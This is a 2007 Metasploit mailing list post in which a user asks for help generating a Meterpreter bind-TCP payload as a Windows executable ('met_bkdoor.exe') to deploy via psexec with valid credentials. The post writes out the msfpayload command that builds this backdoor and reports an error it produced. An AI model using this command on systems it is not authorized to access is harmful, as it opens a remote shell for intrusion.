Metasploit mailing list archives

Connect to a remote windows host with valid credentials (no exploit)

From: nicolasfr at gmail.com (Nicolas FR)
Date: Fri, 1 Jun 2007 15:43:13 +0200

Thanks (and also thanks to the persons who replied to me directly).

I was thinking about psexec but was missing the way to export the payload as
an .exe. As noted in one answer I received I tried to follow Ramakrishna
Nyayapathi's email on this list from May 10th. But all I get under windows
when generating the .exe (ruby msfpayload windows/meterpreter/bind_tcp
LPORT=4444 EXITFUNC=thread X > met_bkdoor.exe) is : "this program cannot be
run in DOS mode."

I'll try to generate the .exe under Linux maybe that will work better.

Nicolas.